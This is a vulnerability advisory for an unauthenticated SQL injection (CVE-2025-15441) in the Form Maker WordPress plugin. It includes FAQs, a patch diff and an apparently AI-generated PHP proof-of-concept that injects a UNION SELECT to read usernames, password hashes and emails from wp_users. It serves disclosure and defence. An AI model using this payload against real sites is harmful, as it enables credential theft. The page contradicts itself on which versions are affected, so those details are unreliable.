What is CVE-2025-15441?

CVE-2025-15441 is a high-severity SQL injection vulnerability affecting the Form Maker by 10Web plugin for WordPress, specifically in versions prior to 1.15.38. It allows unauthenticated attackers to inject SQL queries into the database due to insufficient escaping of user-supplied parameters.

How does the SQL injection vulnerability work?

The vulnerability exists in the frontend model handler of the Form Maker plugin, where user-submitted form field values are directly substituted into SQL queries without proper sanitization. Attackers can craft malicious input to manipulate the SQL query structure, potentially extracting sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using the Form Maker plugin version 1.15.38 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary to mitigate the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and locate the Form Maker plugin. Verify that the version is 1.15.38 or later; if it is earlier, your site is vulnerable.

What should I do to fix this vulnerability?

To mitigate CVE-2025-15441, update the Form Maker plugin to version 1.15.38 or later, where the vulnerability has been patched. Regularly check for updates to all plugins to reduce security risks.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It implies that successful exploitation could lead to unauthorized access to sensitive data.

What kind of data could be compromised?

If exploited, an attacker could extract sensitive information from the WordPress database, including user credentials, session tokens, and other private data stored in the wp_users and wp_usermeta tables.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can craft a malicious payload to exploit the SQL injection vulnerability. It mimics a form submission that includes SQL injection strings, demonstrating how the vulnerability can be exploited to retrieve user data.

What is the importance of parameterized queries?

Parameterized queries are crucial for preventing SQL injection attacks. They ensure that user input is treated as data rather than executable code, significantly reducing the risk of injection vulnerabilities in SQL queries.

Can this vulnerability lead to further attacks?

Yes, successful exploitation of this vulnerability could allow attackers to gain sensitive information, which may facilitate further attacks, including privilege escalation or lateral movement within the application.

What additional security measures should I consider?

In addition to updating plugins, consider implementing web application firewalls, regular security audits, and user input validation to enhance the overall security posture of your WordPress site.

Where can I find more information about CVE-2025-15441?

More detailed information about CVE-2025-15441 can be found on the official CVE database and security advisory websites. Additionally, the plugin’s changelog may provide insights into the specific changes made in the patched version.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2025-15441: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.38 – Unauthenticated SQL Injection (form-maker)

CVE ID CVE-2025-15441

Plugin form-maker

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.15.38

Patched Version 1.15.38

Disclosed April 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15441:
This is an unauthenticated SQL injection vulnerability in the Form Maker by 10Web plugin for WordPress, affecting versions prior to 1.15.38. The vulnerability exists in the frontend model handler and carries a CVSS score of 7.5. The issue allows attackers to inject SQL queries through a lack of proper parameter sanitization and query preparation.

The root cause lies in the file form-maker/frontend/models/form_maker.php, specifically within the SQL query building logic near line 2618. The vulnerable code processes user-submitted form field values (captured in the $fvals array) and directly substitutes them into SQL queries using string replacement. The code previously used str_replace to remove quote characters around field keys before substitution, which failed to properly escape or parameterize the values. The preg_replace_callback function on line 2622 handles placeholders in the form {field_key}, but the injection occurs because field values are substituted without adequate SQL escaping before being passed to the query.

An attacker can exploit this vulnerability by submitting a crafted HTTP POST request to a form managed by the plugin. The attack vector targets the frontend form submission endpoint, where the user supplies a form field value containing SQL injection payloads wrapped in curly braces. For example, an attacker could submit a value like {field_key} where field_key contains a SQL injection string such as 1′ UNION SELECT … The plugin’s query building logic then substitutes this value directly into the SQL query without proper sanitization, allowing the attacker to manipulate the query structure and extract data.

The patch modifies the code by introducing a $query_keys array that merges user form values ($fvals) with system field mappings ($user_fields) where keys now include curly braces (e.g., “{ip}” => $ip). The patch removes the vulnerable string replacement loop that stripped quotes from field keys (lines 2622-2625 in the vulnerable version). Instead of substituting values via str_replace, the patched version uses parameterized placeholders via the preg_replace_callback function. The callback now returns “%s” placeholders for matched placeholders and populates the $query_values array for use with $wpdb->prepare(), which ensures proper escaping. The system field substitutions are now handled through the same $query_keys mechanism rather than a separate str_replace call after the main substitution.

Successful exploitation allows an unauthenticated attacker to extract sensitive information from the WordPress database. This can include user credentials, session tokens, password hashes, and other private data from wp_users and wp_usermeta tables. The attacker may also be able to read arbitrary database tables, potentially leading to further privilege escalation or lateral movement within the application.

Note: This vulnerability requires the attacker to have access to a published form on the target site. The form must include query-based database operations configured in the plugin’s frontend submission handling.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/form-maker/form-maker.php
+++ b/form-maker/form-maker.php
@@ -3,7 +3,7 @@
  * Plugin Name: Form Maker
  * Plugin URI: https://10web.io/plugins/wordpress-form-maker/?utm_source=form_maker&utm_medium=free_plugin
  * Description: This plugin is a modern and advanced tool for easy and fast creating of a WordPress Form. The backend interface is intuitive and user friendly which allows users far from scripting and programming to create WordPress Forms.
- * Version: 1.15.37
+ * Version: 1.15.38
  * Author: 10Web Form Builder Team
  * Author URI: https://10web.io/plugins/?utm_source=form_maker&utm_medium=free_plugin
  * License: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
@@ -26,8 +26,8 @@
   public $plugin_url = '';
   public $front_urls = array();
   public $main_file = '';
-  public $plugin_version = '1.15.37';
-  public $db_version = '2.15.37';
+  public $plugin_version = '1.15.38';
+  public $db_version = '2.15.38';
   public $menu_postfix = '_fm';
   public $plugin_postfix = '';
   public $handle_prefix = 'fm';
--- a/form-maker/frontend/models/form_maker.php
+++ b/form-maker/frontend/models/form_maker.php
@@ -2589,11 +2589,11 @@
       $html_list .= '</table>';
     }
     $user_fields = array(
-      "ip" => $ip,
-      "subid" => $group_id,
-      "userid" => $wp_userid,
-      "username" => $wp_username,
-      "useremail" => $wp_useremail,
+      "{ip}" => $ip,
+      "{subid}" => $group_id,
+      "{userid}" => $wp_userid,
+      "{username}" => $wp_username,
+      "{useremail}" => $wp_useremail,
     );
     $queries = $wpdb->get_results($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker_query WHERE form_id=%d", (int) $id));
     if ( $queries ) {
@@ -2618,23 +2618,16 @@
         $temp = explode('***wdfdatabasewdf***', $temp[1]);
         $database = $temp[0];
         $query = $query->query;
-        foreach ( array_keys($fvals) as $fval_key ) {
-	      $query = str_replace('"' . $fval_key . '"', $fval_key, $query);
-	      $query = str_replace(''' . $fval_key . ''', $fval_key, $query);
-	      $query = str_replace('`' . $fval_key . '`', $fval_key, $query);
-        }
         $query_values = array();
-        $query = preg_replace_callback('/{([^}]+)}/', function($match) use ($fvals, &$query_values) {
+		$query_keys = array_merge($fvals, $user_fields);
+        $query = preg_replace_callback('/{([^}]+)}/', function($match) use ($query_keys, &$query_values) {
 	      $placeholder_key = $match[0];
-	      if ( isset($fvals[$placeholder_key]) ) {
-		      $query_values[] = $fvals[$placeholder_key];
+	      if ( isset($query_keys[$placeholder_key]) ) {
+		      $query_values[] = $query_keys[$placeholder_key];
 		      return '"%s"';
 	      }
 	      return '"' . $match[0] . '"';
         }, $query);
-        foreach ( $user_fields as $user_key => $user_field ) {
-          $query = str_replace('{' . $user_key . '}', $user_field, $query);
-        }
         if ( $con_type == 'remote' ) {
           $wpdb_temp = new wpdb($username, $password, $database, $host);
           if ( !empty($query_values) ) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15441 - Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.38 - Unauthenticated SQL Injection

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to the target WordPress site
$form_id = 1; // Change this to a valid form ID on the target

// Step 1: Generate a malicious payload that exploits the SQL injection
// The vulnerable code processes form field values and substitutes them into SQL queries.
// We inject into the field value that gets placed into the query.

$malicious_value = "1' UNION SELECT user_login,user_pass,user_email FROM wp_users-- ";

// Step 2: Build the POST data mimicking a form submission
$post_data = array(
    'action' => 'form_maker_submit',
    'form_id' => $form_id,
    'form_fields' => array(
        'field_1' => $malicious_value, // Replace field_1 with actual field name from the form
        'field_2' => 'test'
    )
);

// Step 3: Send the request via cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded'
));

$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "n";
} else {
    echo "Response:n" . $response . "n";
}
curl_close($ch);

// Note: This PoC demonstrates the injection vector.
// The exact field names and form structure must match the target's form configuration.
// In a real attack, the attacker would enumerate form fields and IDs.
?>

Frequently Asked Questions

What is CVE-2025-15441?
Overview of the vulnerability
CVE-2025-15441 is a high-severity SQL injection vulnerability affecting the Form Maker by 10Web plugin for WordPress, specifically in versions prior to 1.15.38. It allows unauthenticated attackers to inject SQL queries into the database due to insufficient escaping of user-supplied parameters.
How does the SQL injection vulnerability work?
Mechanism of exploitation
The vulnerability exists in the frontend model handler of the Form Maker plugin, where user-submitted form field values are directly substituted into SQL queries without proper sanitization. Attackers can craft malicious input to manipulate the SQL query structure, potentially extracting sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Form Maker plugin version 1.15.38 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary to mitigate the vulnerability.
How can I check if my site is vulnerable?
Steps to verify the plugin version
To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and locate the Form Maker plugin. Verify that the version is 1.15.38 or later; if it is earlier, your site is vulnerable.
What should I do to fix this vulnerability?
Recommended actions
To mitigate CVE-2025-15441, update the Form Maker plugin to version 1.15.38 or later, where the vulnerability has been patched. Regularly check for updates to all plugins to reduce security risks.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. It implies that successful exploitation could lead to unauthorized access to sensitive data.
What kind of data could be compromised?
Potential risks of exploitation
If exploited, an attacker could extract sensitive information from the WordPress database, including user credentials, session tokens, and other private data stored in the wp_users and wp_usermeta tables.
How does the proof of concept demonstrate the vulnerability?
Illustration of exploitation
The proof of concept provided shows how an attacker can craft a malicious payload to exploit the SQL injection vulnerability. It mimics a form submission that includes SQL injection strings, demonstrating how the vulnerability can be exploited to retrieve user data.
What is the importance of parameterized queries?
Best practices for SQL security
Parameterized queries are crucial for preventing SQL injection attacks. They ensure that user input is treated as data rather than executable code, significantly reducing the risk of injection vulnerabilities in SQL queries.
Can this vulnerability lead to further attacks?
Potential for escalation
Yes, successful exploitation of this vulnerability could allow attackers to gain sensitive information, which may facilitate further attacks, including privilege escalation or lateral movement within the application.
What additional security measures should I consider?
Enhancing overall security
In addition to updating plugins, consider implementing web application firewalls, regular security audits, and user input validation to enhance the overall security posture of your WordPress site.
Where can I find more information about CVE-2025-15441?
Resources for further reading
More detailed information about CVE-2025-15441 can be found on the official CVE database and security advisory websites. Additionally, the plugin’s changelog may provide insights into the specific changes made in the patched version.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations